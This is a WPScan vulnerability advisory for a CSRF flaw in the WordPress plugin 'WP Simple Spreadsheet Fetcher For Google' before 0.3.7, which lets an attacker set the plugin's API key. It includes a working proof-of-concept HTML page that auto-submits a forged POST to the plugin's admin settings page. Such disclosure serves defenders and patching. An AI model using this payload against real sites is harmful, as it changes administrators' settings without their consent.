WP Simple Spreadsheet Fetcher For Google < 0.3.7 - Arbitrary API Key update via CSRF



Description
The lack of Cross-Site Request Forgery (CSRF) checks on the plugin's settings page could allow CSRF attacks to set an arbitrary API key.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://[WP]/wp-admin/admin.php?page=wsgsf_settings" method="POST">
      <input type="hidden" name="api_key" value="YOLO" />
    </form>
  </body>
</html>

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/2222358

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Views 46720
Verified Yes
WPVDB ID 10005

Timeline

Publicly Published 2020-01-06 (17 days ago)
Added 2020-01-06 (16 days ago)
Last Updated 2020-01-06 (16 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin